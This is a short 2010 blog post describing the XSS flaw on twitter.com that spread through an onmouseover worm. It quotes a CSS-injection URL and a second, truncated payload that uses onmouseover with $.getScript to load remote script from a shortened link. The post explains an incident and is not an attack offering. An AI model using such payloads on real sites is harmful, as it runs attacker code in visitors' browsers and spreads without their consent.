XSS vulnerability on twitter.com

So Judofyr found a XSS-exploit on Twitter.com and within minutes it spreaded like wildfire. His original tweet just set the anchor background color to black but his next tweet included onmouseover and people could not stop moving the mouse over the tweet resulting in over 40000 tweets within 10 minutes.

The exploit: http://judofyr.net/@"style="background:#000;color:#000;/

So Twitter does not encode the URL and whatever is after the @ gets included in the anchor. So css and javascript can be included.

Shortly after someone else created a more evil approach:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A ...

Written on 21 September 2010.

Related Posts

• 26 May 2021 » Wildcard SSL-certificate on Heroku and CloudFront
• 15 Nov 2013 » Be silent customer
• 14 Jul 2012 » How not to treat passwords